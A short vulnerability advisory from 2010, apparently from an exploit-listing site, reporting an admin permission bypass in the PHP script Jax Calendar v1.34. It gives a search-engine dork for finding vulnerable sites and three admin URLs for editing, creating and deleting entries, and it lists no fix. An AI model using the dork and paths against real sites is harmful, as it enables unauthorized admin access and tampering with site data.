Jax Calendar v1.34 Arbitrary Admin Access Vulnerability

2010-05-27 15:11:42

Jax Calendar v1.34 Remote Permission Bypass Vulnerability


###############################
FOUND BY: R4M! - [email protected]
###############################


DORK: inurl:?do=edit_entry


SCRIPT: Jax Calendar v1.34 by Jack (tR), http://www.jtr.de/scripting/php


EXAMPLE:
1. /admin/calendar.admin.php?do=edit_entry
2. /admin/calendar.admin.php?do=new_entry
3. /admin/calendar.admin.php?do=delete_entry


########################################
Special Greetz to: (APOCAN/VURAL/

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.